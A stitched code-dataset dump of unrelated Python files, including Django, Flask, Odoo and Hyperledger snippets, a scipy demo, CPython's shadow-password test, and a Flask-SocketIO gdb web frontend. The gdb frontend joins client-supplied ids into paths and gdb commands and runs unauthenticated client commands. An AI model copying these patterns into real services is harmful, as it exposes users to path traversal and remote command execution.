list of strs - the name of each artefact found in the artefacts_folder path
"""
artefacts_dir = os.path.join(settings.MANTRA_PROJECT_ROOT, artefacts_folder)
if os.path.isdir(artefacts_dir):
artefacts_list = [o for o in os.listdir(artefacts_dir) if os.path.isdir(os.path.join(artefacts_dir, o))]
else:
artefacts_list = []
return artefacts_list
class Task:
@classmethod
def calculate_task_metadata(cls, settings, trials):
"""
This method produces a dictionary of tasks, with keys as the task names, which contain dictionaries of metadata such as the model
with the best loss.
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
trials - list of dicts
Each dictionary containing trial metadata
Returns
------------
dict - keys as task names, values as dictionaries containing metadata on each task
"""
tasks_used = [trial['task_name'] for trial in trials if trial['task_name'] != 'none']
occur = Counter(tasks_used)
task_dict = dict(occur) # e.g. {'task_1': 6} - is a way for us to count the number of trials for each task
for task_name, n_trials in task_dict.items():
task_dict[task_name] = {'n_trials': n_trials}
task_dict[task_name].update(Mantra.find_task_metadata(task_name))
task_trials = [trial for trial in trials if trial['task_name'] == task_name]
for task_trial in task_trials:
try:
task_trial['trial_metadata'] = yaml.load(open('%s/trials/%s/trial_metadata.yml' % (settings.MANTRA_PROJECT_ROOT, task_trial['folder_name']), 'r').read())
except: # can't load yaml
task_trial['trial_metadata'] = {}
try:
trials_with_validation_loss = [trial for trial in task_trials if 'validation_loss' in trial['trial_metadata']]
task_dict[task_name]['best_loss'] = min([trial['trial_metadata']['validation_loss'] for trial in trials_with_validation_loss])
task_dict[task_name]['best_model_folder'] = [trial for trial in trials_with_validation_loss if trial['trial_metadata']['validation_loss'] == task_dict[task_name]['best_loss']][0]['model_name']
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
except AttributeError:
task_dict[task_name]['best_loss'] = None
task_dict[task_name]['best_model_folder'] = None
if task_dict[task_name]['best_model_folder'] is not None:
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
else:
task_dict[task_name]['best_model_metadata'] = None
except ValueError:
task_dict[task_name]['best_loss'] = None
task_dict[task_name]['best_model_folder'] = None
if task_dict[task_name]['best_model_folder'] is not None:
task_dict[task_name]['best_model_metadata'] = Mantra.find_model_metadata(task_dict[task_name]['best_model_folder'])
else:
task_dict[task_name]['best_model_metadata'] = None
return task_dict
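
# Hypothetical usage sketch (assumes a configured Django settings module with
# MANTRA_PROJECT_ROOT pointing at a Mantra project containing a .mantra/TRIALS
# file; the model name is an invented placeholder):
#
#   from django.conf import settings
#   trial_groups, trials = Trial.get_trial_group_members(settings, model_filter="my_model")
#   group_metadata = Trial.get_all_trial_group_metadata(settings, trial_groups)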
| StarcoderdataPython |
1699118 | # Should match the matlab version
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal
A = np.array([[0.0, 1.0], [0.0, -10.0/100]])
B = np.array([[0.0], [1.0/100.0]])
C = np.array([1.0, 0.0])
D = np.array([0.0])
K = np.array([30.0, 70.0])
X = np.array([10, 0.0])
# B is (2, 1) and K broadcasts as a row vector, so B*K equals the outer
# product B @ K.reshape(1, 2); A - B*K is the closed-loop state matrix.
sys = signal.StateSpace(A - B*K, B, C, D)
t, y = signal.step(sys, X0=X)
plt.plot(t, y, 'b--', label="State Space")
plt.legend()
plt.show()
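
# Extra check, not in the original script: inspect the closed-loop poles of
# A - B*K directly; K is treated here as the row vector [30, 70], which matches
# the broadcasted B*K used above.
closed_loop_poles = np.linalg.eigvals(A - B @ K.reshape(1, 2))
print("closed-loop poles:", closed_loop_poles)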
| StarcoderdataPython |
3217460 | <filename>Lib/test/test_spwd.py
import os
import unittest
from test import support
spwd = support.import_module('spwd')
@unittest.skipUnless(hasattr(os, 'geteuid') and os.geteuid() == 0,
'root privileges required')
class TestSpwdRoot(unittest.TestCase):
def test_getspall(self):
entries = spwd.getspall()
self.assertIsInstance(entries, list)
for entry in entries:
self.assertIsInstance(entry, spwd.struct_spwd)
def test_getspnam(self):
entries = spwd.getspall()
if not entries:
self.skipTest('empty shadow password database')
random_name = entries[0].sp_namp
entry = spwd.getspnam(random_name)
self.assertIsInstance(entry, spwd.struct_spwd)
self.assertEqual(entry.sp_namp, random_name)
self.assertEqual(entry.sp_namp, entry[0])
self.assertEqual(entry.sp_namp, entry.sp_nam)
self.assertIsInstance(entry.sp_pwdp, str)
self.assertEqual(entry.sp_pwdp, entry[1])
self.assertEqual(entry.sp_pwdp, entry.sp_pwd)
self.assertIsInstance(entry.sp_lstchg, int)
self.assertEqual(entry.sp_lstchg, entry[2])
self.assertIsInstance(entry.sp_min, int)
self.assertEqual(entry.sp_min, entry[3])
self.assertIsInstance(entry.sp_max, int)
self.assertEqual(entry.sp_max, entry[4])
self.assertIsInstance(entry.sp_warn, int)
self.assertEqual(entry.sp_warn, entry[5])
self.assertIsInstance(entry.sp_inact, int)
self.assertEqual(entry.sp_inact, entry[6])
self.assertIsInstance(entry.sp_expire, int)
self.assertEqual(entry.sp_expire, entry[7])
self.assertIsInstance(entry.sp_flag, int)
self.assertEqual(entry.sp_flag, entry[8])
with self.assertRaises(KeyError) as cx:
spwd.getspnam('invalid user name')
self.assertEqual(str(cx.exception), "'getspnam(): name not found'")
self.assertRaises(TypeError, spwd.getspnam)
self.assertRaises(TypeError, spwd.getspnam, 0)
self.assertRaises(TypeError, spwd.getspnam, random_name, 0)
try:
bytes_name = os.fsencode(random_name)
except UnicodeEncodeError:
pass
else:
self.assertRaises(TypeError, spwd.getspnam, bytes_name)
@unittest.skipUnless(hasattr(os, 'geteuid') and os.geteuid() != 0,
'non-root user required')
class TestSpwdNonRoot(unittest.TestCase):
def test_getspnam_exception(self):
name = 'bin'
try:
with self.assertRaises(PermissionError) as cm:
spwd.getspnam(name)
except KeyError as exc:
self.skipTest("spwd entry %r doesn't exist: %s" % (name, exc))
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3386230 | <filename>gandalf/api/auth.py<gh_stars>0
from flask import Blueprint
from flask_restful import Resource, Api
auth_blueprint = Blueprint("auth", __name__, url_prefix="/auth")
api = Api(auth_blueprint)
class AuthPing(Resource):
def get(self):
return {"status": "success", "message": "pong!"}
api.add_resource(AuthPing, "/ping")
| StarcoderdataPython |
3386941 | import traceback
from flask import Flask, redirect, request, render_template, session , url_for, jsonify
from flask_socketio import SocketIO, emit
from flask_compress import Compress
import os
from utils import *
ResponseThread = None
app = Flask(__name__)
app.app_context().push()
websocket = SocketIO(app)
app.config["socket"] = websocket
import config
from db import User , Example,db
from checklogin import login
from mainpage import main
app.register_blueprint(login)
app.register_blueprint(main)
Compress(app)
manager = app.config["manager"]
@websocket.on("connect",namespace="/gdb_listener")
def connect_handler():
desired_gdbpid = int(request.args.get("gdbpid", 0))
try:
if desired_gdbpid:
debug_session = manager.connect_client_to_debug_session(
desired_gdbpid=desired_gdbpid, client_id=request.sid
)
emit(
"debug_session_connection_event",
{
"ok": True,
"started_new_gdb_process": False,
"pid": debug_session.pid,
"message": f"Connected to existing gdb process {desired_gdbpid}",
},
)
else:
gdb_command = request.args.get("gdb_command", app.config["gdb_command"])
mi_version = request.args.get("mi_version", "mi2")
debug_session = manager.add_new_debug_session(
gdb_command=gdb_command, mi_version=mi_version, client_id=request.sid
)
emit(
"debug_session_connection_event",
{
"ok": True,
"started_new_gdb_process": True,
"message": f"Started new gdb process, pid {debug_session.pid}",
"pid": debug_session.pid,
},
)
except Exception as e:
emit(
"debug_session_connection_event",
{"message": f"Failed to establish gdb session: {e}", "ok": False},
)
if manager.gdb_reader_thread is None:
manager.gdb_reader_thread = websocket.start_background_task(
target=read_and_forward_gdb_and_pty_output
)
logging.info("Created background thread to read gdb responses")
@websocket.on("set_dir",namespace="/gdb_listener")
def set_dir(data):
id = data["id"]
path = os.path.join(app.config["STORE_PATH"],id)
client_id = request.sid
debug_session = manager.debug_session_from_client_id(client_id)
if not debug_session:
emit("error_running_gdb_command", {"message": "no session"})
return
pty_mi = debug_session.pygdbmi_controller
if pty_mi is not None:
try:
cmds = [f"00-environment-cd {path}"]
for cmd in cmds:
pty_mi.write(
cmd + "\n",
timeout_sec=0,
raise_error_on_timeout=False,
read_response=False,
)
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
else:
emit("error_running_gdb_command", {"message": "gdb is not running"})
@websocket.on("pty_interaction", namespace="/gdb_listener")
def pty_interaction(message):
debug_session = manager.debug_session_from_client_id(request.sid)
if not debug_session:
emit(
"error_running_gdb_command",
{"message": f"no gdb session available for client id {request.sid}"},
)
return
try:
data = message.get("data")
print(data)
pty_name = data.get("pty_name")
if pty_name == "user_pty":
pty = debug_session.pty_for_gdb
elif pty_name == "program_pty":
pty = debug_session.pty_for_debugged_program
else:
raise ValueError(f"Unknown pty: {pty_name}")
action = data.get("action")
if action == "write":
key = data["key"]
pty.write(key)
elif action == "set_winsize":
pty.set_winsize(data["rows"], data["cols"])
else:
raise ValueError(f"Unknown action {action}")
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
@websocket.on("run_gdb_command", namespace="/gdb_listener")
def run_gdb_command(message):
client_id = request.sid
debug_session = manager.debug_session_from_client_id(client_id)
if not debug_session:
emit("error_running_gdb_command", {"message": "no session"})
return
pty_mi = debug_session.pygdbmi_controller
if pty_mi is not None:
try:
cmds = message["cmd"]
print(cmds)
for cmd in cmds:
pty_mi.write(
cmd + "\n",
timeout_sec=0,
raise_error_on_timeout=False,
read_response=False,
)
except Exception:
err = traceback.format_exc()
logging.error(err)
emit("error_running_gdb_command", {"message": err})
else:
emit("error_running_gdb_command", {"message": "gdb is not running"})
@websocket.on("disconnect", namespace="/gdb_listener")
def client_disconnected():
"""do nothing if client disconnects"""
manager.disconnect_client(request.sid)
logging.info("Client websocket disconnected, id %s" % (request.sid))
def read_and_forward_gdb_and_pty_output():
while True:
websocket.sleep(0.05)
debug_sessions_to_remove = []
for debug_session, client_ids in manager.debug_session_to_client_ids.items():
try:
try:
response = debug_session.pygdbmi_controller.get_gdb_response(
timeout_sec=0, raise_error_on_timeout=False
)
except Exception:
response = None
send_msg_to_clients(
client_ids,
"The underlying gdb process has been killed. This tab will no longer function as expected.",
error=True,
)
debug_sessions_to_remove.append(debug_session)
if response:
for client_id in client_ids:
logging.info(
"emiting message to websocket client id " + client_id
)
websocket.emit(
"gdb_response",
response,
namespace="/gdb_listener",
room=client_id,
)
else:
# there was no queued response from gdb, not a problem
pass
except Exception:
logging.error("caught exception, continuing:" + traceback.format_exc())
debug_sessions_to_remove += check_and_forward_pty_output()
for debug_session in set(debug_sessions_to_remove):
manager.remove_debug_session(debug_session)
def check_and_forward_pty_output():
debug_sessions_to_remove = []
for debug_session, client_ids in manager.debug_session_to_client_ids.items():
try:
response = debug_session.pty_for_gdb.read()
if response is not None:
for client_id in client_ids:
websocket.emit(
"user_pty_response",
response,
namespace="/gdb_listener",
room=client_id,
)
response = debug_session.pty_for_debugged_program.read()
if response is not None:
for client_id in client_ids:
websocket.emit(
"program_pty_response",
response,
namespace="/gdb_listener",
room=client_id,
)
except Exception as e:
debug_sessions_to_remove.append(debug_session)
for client_id in client_ids:
websocket.emit(
"fatal_server_error",
{"message": str(e)},
namespace="/gdb_listener",
room=client_id,
)
logging.error(e, exc_info=True)
return debug_sessions_to_remove
def send_msg_to_clients(client_ids, msg, error=False):
if error:
stream = "stderr"
else:
stream = "stdout"
response = [{"message": None, "type": "console", "payload": msg, "stream": stream}]
for client_id in client_ids:
logging.info("emiting message to websocket client id " + client_id)
websocket.emit(
"gdb_response", response, namespace="/gdb_listener", room=client_id
)
@websocket.on("compile",namespace="/gdb_listener")
def compile_handler(data):
id = data["id"]
path = os.path.join(app.config["STORE_PATH"],id)
purepath = Path(path)
for x in purepath.iterdir():
if x.is_file() and (x.suffix == ".out" or x.suffix==".o"):
os.remove(x.as_posix())
os.chdir(path)
cmd = f"gcc -fno-stack-protector -g -c *.c "
cmd += f"2>out 1>/dev/null"
print(cmd)
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
cmd = "ld -r *.o -o a.o "
cmd += f" 2>out 1>/dev/null"
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
cmd = "gcc -g -fno-stack-protector a.o "
cmd += f"2>out 1>/dev/null"
os.system(cmd)
f = open(f"out", "r")
data = f.read(20480)
f.close()
if data:
emit("compile", {
"status": False,
"err": data
})
return
for x in purepath.iterdir():
if x.is_file() and x.suffix == ".out":
emit("compile", {
"status": True
})
return
emit("compile", {
"status": False,
"err": data
})
@websocket.on("public_example",namespace="/gdb_listener")
def public_example(data):
data = data["data"]
id = data["id"]
author = data["author"]
name = data["name"]
description = data["description"]
path = app.config["EXAMPLE_PATH"]
example_path = os.path.join(path,id)
cur_path = os.path.join(app.config["STORE_PATH"],id)
out_path = os.path.join(cur_path,"a.out")
print(out_path)
if(not os.path.exists(out_path)):
emit("public_example_response",{
"status":False,
"err":f"This example is not compiled"
})
return
if(Example.find(name,id)):
print(name,id)
print(Example.find(name,id))
emit("public_example_response",{
"status":False,
"err":f"an example named {name} is already existed!"
})
return
if(not os.path.exists(example_path)):
make_dir(example_path)
name_path = os.path.join(example_path,name)
description_path = os.path.join(name_path,"description")
author_path = os.path.join(name_path,"author")
if(os.path.exists(name_path)):
shutil.rmtree(name_path)
os.mkdir(name_path)
else:
os.mkdir(name_path)
mk_write_file(description_path,description)
mk_write_file(author_path,author)
copy_search_file(cur_path,name_path)
Example.add(id,name,description,name_path)
emit("public_example_response",{
"status":True,
"err":f""
})
@websocket.on("get_example_list",namespace="/gdb_listener")
def get_example_list():
all_example = Example.query.all()
example_list = []
for example in all_example:
example_list.append(f"{example.id} {example.name} {example.description}")
emit("example_list",{
"list":example_list
})
@websocket.on("get_path",namespace="/gdb_listener")
def get_path(data):
author_id = data["author_id"]
id = data["id"]
name = data["name"]
path =os.path.join( app.config["EXAMPLE_PATH"],author_id)
path =os.path.join( path,name)
file_tree={}
file_path=[]
get_file(path,file_tree,file_path)
cur_path = os.path.join(app.config["STORE_PATH"],id)
clear_dir(cur_path)
copy_search_file(path,cur_path)
emit("get_path_response",{
"path":file_path
})
@websocket.on("get_my_public",namespace="/gdb_listener")
def get_my_public(data):
author_id = data["id"]
all_example = Example.find_by_id(author_id)
example_list = []
for example in all_example:
example_list.append(f"{example.id} {example.name} {example.description}")
emit("get_my_public_response",{
"list":example_list
})
@websocket.on("delete_my_public",namespace="/gdb_listener")
def delete_my_public(data):
author_id = data["id"]
name = data["name"]
find = Example.find(name,author_id)
try:
if(isinstance(find,list)):
for fi in find:
shutil.rmtree(fi.dir_path)
db.session.delete(fi)
db.session.commit()
except AttributeError:
emit("delete_my_public_response",{
"status":False
})
return
emit("delete_my_public_response",{
"status":True
})
@websocket.on("line_change",namespace="/gdb_listener")
def line_change(data):
file = data["file"]
id = data["id"]
start = data["start"]
num = data["num"]
file_path = os.path.join(app.config["STORE_PATH"],id)
file_path = Path(file_path)
fs = [x for x in file_path.iterdir() if x.is_file() and x.suffix==".asset"]
for f in fs:
pos = f.stem.find(file)
if(pos==-1):
continue
line = int(f.stem[pos+len(file):])
if(line>start):
os.rename(f.as_posix(),os.path.join(file_path.as_posix(),f"{file}{line+num}.asset"))
os.rename(os.path.join(file_path.as_posix(),f"{file}{line}.des"),os.path.join(file_path.as_posix(),f"{file}{line+num}.des"))
@websocket.on("delete_attachment",namespace="/gdb_listener")
def delete_attachment(data):
id =data["id"]
name = data["name"]
file_path = os.path.join(app.config["STORE_PATH"],id)
os.remove(os.path.join(file_path,f"{name}.asset"))
os.remove(os.path.join(file_path,f"{name}.des"))
emit("delete_attachment_response",{
"status":True
})
if __name__ == '__main__':
db.create_all()
# User.add("0","0","swj","<EMAIL>")
websocket.run(app, "0.0.0.0",debug=False)
| StarcoderdataPython |
46743 | sessions = [{
"1": {
"type": "session",
"source": {"id": "scope"},
"id": "1",
'profile': {"id": "1"}
}
}]
profiles = [
{"1": {'id': "1", "traits": {}}},
{"2": {'id': "2", "traits": {}}},
]
class MockStorageCrud:
def __init__(self, index, domain_class_ref, entity):
self.index = index
self.domain_class_ref = domain_class_ref
self.entity = entity
if index == 'session':
self.data = sessions
elif index == 'profile':
self.data = profiles
async def load(self):
for item in self.data:
if self.entity.id in item:
return self.domain_class_ref(**item[self.entity.id])
return None
async def save(self):
self.data.append({self.entity.id: self.entity.dict(exclude_unset=True)})
async def delete(self):
        self.data[:] = [item for item in self.data if self.entity.id not in item]
class EntityStorageCrud:
def __init__(self, index, entity):
self.index = index
self.entity = entity
if index == 'session':
self.data = sessions
elif index == 'profile':
self.data = profiles
async def load(self, domain_class_ref):
for item in self.data:
if self.entity.id in item:
return domain_class_ref(**item[self.entity.id])
return None
async def save(self):
self.data.append({self.entity.id: self.entity.dict(exclude_unset=True)})
async def delete(self):
        self.data[:] = [item for item in self.data if self.entity.id not in item]
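# Minimal usage sketch (not part of the original fixture; Entity is a stand-in pydantic model,
# chosen because the CRUD classes call .dict(exclude_unset=True) on the stored entity).
if __name__ == "__main__":
    import asyncio
    from pydantic import BaseModel

    class Entity(BaseModel):
        id: str
        traits: dict = {}

    crud = EntityStorageCrud('profile', Entity(id="1"))
    loaded = asyncio.run(crud.load(Entity))
    print(loaded)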
| StarcoderdataPython |
3210166 | <filename>website_multi_company/tests/test_create.py
# Copyright 2018 <NAME> <https://it-projects.info/team/yelizariev>
# License MIT (https://opensource.org/licenses/MIT).
from odoo.tests.common import TransactionCase
class TestCreate(TransactionCase):
at_install = True
post_install = True
def test_create_partner(self):
company = self.env["res.company"].create({"name": "Non default Company"})
website = self.env.ref("website.website2")
website.company_id = company
Partner = self.env["res.partner"].with_context(website_id=website.id)
p = Partner.create({"name": "Test"})
# Default value in res.partner is computed via env['res.company']._company_default_get
# _company_default_get is computed via env['res.users']._get_company()
# _get_company is redefined in website_multi_company to use website_id from context
self.assertEqual(
p.company_id.id,
company.id,
"Partner creation ignore current website from context",
)
| StarcoderdataPython |
145611 | <filename>courses/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-03-03 15:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('edx_course_key', models.CharField(blank=True, max_length=255, null=True)),
('enrollment_start', models.DateTimeField(blank=True, null=True)),
('start_date', models.DateTimeField(blank=True, null=True)),
('enrollment_url', models.URLField(blank=True, null=True)),
('prerequisites', models.TextField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Program',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('live', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='course',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='courses.Program'),
),
]
| StarcoderdataPython |
182546 | # Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from .users.bootstrap_admin import bootstrap_admin
from .users.admin import admin
from orderer.orderers.orderer1 import orderer1
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
orderer = {
'type': 'orderer',
'name': 'orderer',
'mspid': 'ordererMSP',
'broadcast_dir': {
'external': f'{SUBSTRA_PATH}/data/log/broadcast',
'internal': '/etc/hyperledger/fabric/broadcast'
},
'tls': {
# careful, `ca-cert.pem` is the default cert name file and a
# example file with this name is already present in the docker
# image, do not forget to remove these examples files in your
# docker CMD overriding if naming the same way
'certfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/tls-ca-cert.pem',
'internal': '/etc/hyperledger/fabric/ca/tls-ca-cert.pem'
},
'clientkey': ''
},
'ca': {
'name': 'rca-orderer',
'host': 'rca-orderer',
'certfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/ca-cert.pem',
'internal': '/etc/hyperledger/fabric/ca/ca-cert.pem'
},
'keyfile': {
'external': f'{SUBSTRA_PATH}/data/orgs/orderer/ca-key.pem',
'internal': '/etc/hyperledger/fabric/ca/ca-key.pem'
},
'port': {
'internal': 7054,
'external': 9054
},
'url': 'https://rca-orderer:7054',
'logfile': f'{SUBSTRA_PATH}/data/log/rca-orderer.log',
'server-config-path': f'{SUBSTRA_PATH}/conf/orderer/fabric-ca-server-config.yaml',
'client-config-path': f'{SUBSTRA_PATH}/conf/orderer/fabric-ca-client-config.yaml',
'affiliations': {
'owkin': ['paris']
},
'users': {
'bootstrap_admin': bootstrap_admin,
},
},
'users': {
'admin': admin,
},
'csr': {
'cn': 'rca-orderer',
# The "hosts" value is a list of the domain names which the certificate should be valid for.
'hosts': ['rca-orderer'],
'names': [
{'C': 'FR',
'ST': 'Ile-de-France',
'L': 'Paris',
'O': 'owkin',
'OU': None}
],
},
'core_dir': {
'internal': '/etc/hyperledger/fabric',
},
'orderers': [orderer1],
}
| StarcoderdataPython |
140757 | """The tests for deCONZ logbook."""
from copy import deepcopy
from homeassistant.components import logbook
from homeassistant.components.deconz.deconz_event import CONF_DECONZ_EVENT
from homeassistant.components.deconz.gateway import get_gateway_from_config_entry
from homeassistant.const import CONF_DEVICE_ID, CONF_EVENT, CONF_ID, CONF_UNIQUE_ID
from homeassistant.setup import async_setup_component
from .test_gateway import DECONZ_WEB_REQUEST, setup_deconz_integration
from tests.components.logbook.test_init import MockLazyEventPartialState
async def test_humanifying_deconz_event(hass):
"""Test humanifying deCONZ event."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"id": "Switch 1 id",
"name": "Switch 1",
"type": "ZHASwitch",
"state": {"buttonevent": 1000},
"config": {},
"uniqueid": "00:00:00:00:00:00:00:01-00",
},
"1": {
"id": "Hue remote id",
"name": "Hue remote",
"type": "ZHASwitch",
"modelid": "RWL021",
"state": {"buttonevent": 1000},
"config": {},
"uniqueid": "0fc00:db20:35b:7399::5-00",
},
}
config_entry = await setup_deconz_integration(hass, get_state_response=data)
gateway = get_gateway_from_config_entry(hass, config_entry)
hass.config.components.add("recorder")
assert await async_setup_component(hass, "logbook", {})
entity_attr_cache = logbook.EntityAttributeCache(hass)
events = list(
logbook.humanify(
hass,
[
MockLazyEventPartialState(
CONF_DECONZ_EVENT,
{
CONF_DEVICE_ID: gateway.events[0].device_id,
CONF_EVENT: 2000,
CONF_ID: gateway.events[0].event_id,
CONF_UNIQUE_ID: gateway.events[0].serial,
},
),
MockLazyEventPartialState(
CONF_DECONZ_EVENT,
{
CONF_DEVICE_ID: gateway.events[1].device_id,
CONF_EVENT: 2001,
CONF_ID: gateway.events[1].event_id,
CONF_UNIQUE_ID: gateway.events[1].serial,
},
),
],
entity_attr_cache,
{},
)
)
assert events[0]["name"] == "Switch 1"
assert events[0]["domain"] == "deconz"
assert events[0]["message"] == "fired event '2000'."
assert events[1]["name"] == "Hue remote"
assert events[1]["domain"] == "deconz"
assert events[1]["message"] == "'Long press' event for 'Dim up' was fired."
| StarcoderdataPython |
3377954 | <filename>functions_legacy/FactorAnalysis.py<gh_stars>1-10
import matplotlib.pyplot as plt
import numpy as np
from numpy import sum as npsum
from numpy import zeros, sort, diag, eye, abs, sqrt, tile, maximum, argsort, max as npmax
from numpy.linalg import eig, matrix_rank
plt.style.use('seaborn')
from functions_legacy.ConditionalPC import ConditionalPC
def FactorAnalysis(c2,d,k_):
# This function computes the Low Rank Diagonal Conditional Correlation
# INPUT:
# c2 :[matrix](n_ x n_) correlation matrix
# d :[matrix](m_ x n_) matrix of constraints
# k_ :[scalar] rank of matrix beta.
# OP:
    # c2_LRD :[matrix](n_ x n_) shrunk matrix of the form beta@beta.T+I-diag(beta@beta.T) where beta is a n_ x k_ matrix
# beta :[matrix](n_ x k_) low rank matrix: n_ x k_
# iter :[scalar] number of iterations
# constraint :[scalar] boolean indicator, it is equal to 1 in case the constraint is satisfied, i.e. d@beta = 0
# For details on the exercise, see here .
## Code
CONDITIONAL=1
if npsum(abs(d.flatten()))==0:
CONDITIONAL=0
n_ = c2.shape[0]
if k_ > n_-matrix_rank(d):
raise Warning('k_ has to be <= rho.shape[0]-rank[d]')
NmaxIter = 1000
eps1 = 1e-9
eta = 0.01
gamma = 0.1
constraint = 0
#initialize output
c2_LRD = c2
    dist = 0.0
iter = 0
#0. Initialize
Diag_lambda2, e = eig(c2)
lambda2 = Diag_lambda2
lambda2_ord, order = sort(lambda2)[::-1], argsort(lambda2)[::-1]
lam = np.real(sqrt(lambda2_ord[:k_]))
e_ord = e[:, order]
beta = np.real(e_ord[:n_,:k_]@np.diagflat(maximum(lam,eps1)))
c = c2
for j in range(NmaxIter):
#1. Conditional PC
        a = c-eye(n_)+np.diagflat(diag(beta@beta.T))
if CONDITIONAL==1:
lambda2, E = ConditionalPC(a, d)
lambda2 = lambda2[:k_]
E = E[:,:k_]
lam = sqrt(lambda2)
else:
#if there aren't constraints: standard PC using the covariance matrix
Diag_lambda2, e = eig(a)
lambda2 = Diag_lambda2
lambda2_ord, order = sort(lambda2)[::-1], argsort(lambda2)[::-1]
e_ord = e[:, order]
E = e_ord[:,:k_]
lam = sqrt(lambda2_ord[:k_])
#2.loadings
        beta_new = E@np.diagflat(maximum(lam,eps1))
#3. Rows length
l_n = sqrt(npsum(beta_new**2,1))
#4. Rows scaling
beta_new[l_n > 1,:] = beta_new[l_n > 1,:]/tile(l_n[l_n > 1,np.newaxis]*(1+gamma),(1,k_))
#5. reconstruction
c = beta_new@beta_new.T+eye(n_,n_)-diag(diag(beta_new@beta_new.T))
#6. check for convergence
distance = 1/n_*npsum(sqrt(npsum((beta_new-beta)**2,1)))
if distance <= eta:
c2_LRD = c
dist = distance
iter = j
beta = beta_new.copy()
if d.shape == (1,1):
tol = npmax(abs(d*beta))
else:
tol = npmax(abs(d.dot(beta)))
if tol < 1e-9:
constraint = 1
break
else:
beta = beta_new.copy()
beta = np.real(beta)
c2_LRD = np.real(c2_LRD)
c2_LRD = (c2_LRD+c2_LRD.T)/2
return c2_LRD, beta, dist, iter, constraint
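# Minimal usage sketch (not part of the original function): with d = zeros((1, 1)) the linear
# constraint is inactive, so this reduces to a plain low-rank-plus-diagonal fit of a sample
# correlation matrix; the data below are random and purely illustrative.
if __name__ == "__main__":
    from numpy import corrcoef
    from numpy.random import randn

    x = randn(200, 5)
    c2 = corrcoef(x, rowvar=False)
    c2_lrd, beta_hat, dist_, n_iter, ok = FactorAnalysis(c2, zeros((1, 1)), 2)
    print(c2_lrd.shape, beta_hat.shape, ok)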
| StarcoderdataPython |
107247 | #!/usr/bin/python
# script preparing tab file to plot in R for small RNA profiling
# version 1 29-1-2012
# Usage plotter.py <bowtie input> <min size> <max size> <normalization factor> <tabular output>
import sys
def acquisition (file2parse, sizerange):
F = open (file2parse)
plus_table = {}
minus_table = {}
for line in F:
field = line.split()
coordinate = int( field[3] )
strand = field[1]
sequence = field[4]
size = len (sequence )
if strand == "+" and size in sizerange:
plus_table[coordinate] = plus_table.get(coordinate, 0) + 1
if strand == "-" and size in sizerange:
coordinate = coordinate + size -1 # 23-11-2012 : this line was missing ! it is a BUG that probably altered the Nature maps :-((
minus_table[coordinate] = minus_table.get(coordinate, 0) + 1
return plus_table, minus_table
def output_table (plus_table, minus_table, Nfactor, output):
Nfactor = float(Nfactor)
plus_coordinates = set( plus_table.keys() )
minus_coordinates = set( minus_table.keys() )
coords = sorted (plus_coordinates.union (minus_coordinates) )
## added 23-2-2013 to have, instead, exaustive coordinates
## coords = range (min(coords), max(coords) + 1)
##
OUT = open (output, "w")
print >> OUT, "coord\tplus\tminus"
for coordinate in coords :
print >> OUT, "%s\t%s\t%s" % ( coordinate, plus_table.get(coordinate, 0)*Nfactor, - minus_table.get(coordinate, 0)*Nfactor )
def sizing (minsize, maxsize) :
size_range = range ( int (minsize), int (maxsize) + 1 )
return size_range
plus_table, minus_table = acquisition (sys.argv[1], sizing ( sys.argv[2], sys.argv[3] ) )
output_table ( plus_table, minus_table, sys.argv[4], sys.argv[5] )
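# Example invocation (illustrative file names only, not taken from the original script):
#   python plotter.py aligned_reads.bowtie 19 26 1.0 profile.tab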
| StarcoderdataPython |
3282783 | import os
import jinja2
import reconcile.templates as templates
def get_package_environment():
"""Loads templates from the current Python package"""
templates_dir = os.path.dirname(templates.__file__)
template_loader = jinja2.FileSystemLoader(searchpath=templates_dir)
return jinja2.Environment(loader=template_loader)
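# Minimal usage sketch (not part of the original module; "example.j2" is a placeholder name
# that would have to exist inside the packaged templates directory).
if __name__ == "__main__":
    env = get_package_environment()
    template = env.get_template("example.j2")
    print(template.render())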
| StarcoderdataPython |
1651153 | import subprocess as sp
import torch as th
def run_bench(name, *args, device="cpu"):
args = list(args)
args += ["-d", device]
if device == "cuda" and not th.cuda.is_available():
return "Not available /!\\"
return sp.check_output(["python3", "-m", f"bench.{name}"] + args).decode('utf8')
def main():
template = f"""\
## Benchmarking and verification of Julius
In order to verify the correctness and speed of the implementations in Julius,
we compare ourselves to different reference implementations, comparing speed and
checking how far we are.
### ResampleFrac
We compare `julius.resample` to `resampy`, on an input of size (32, 8 * 44100),
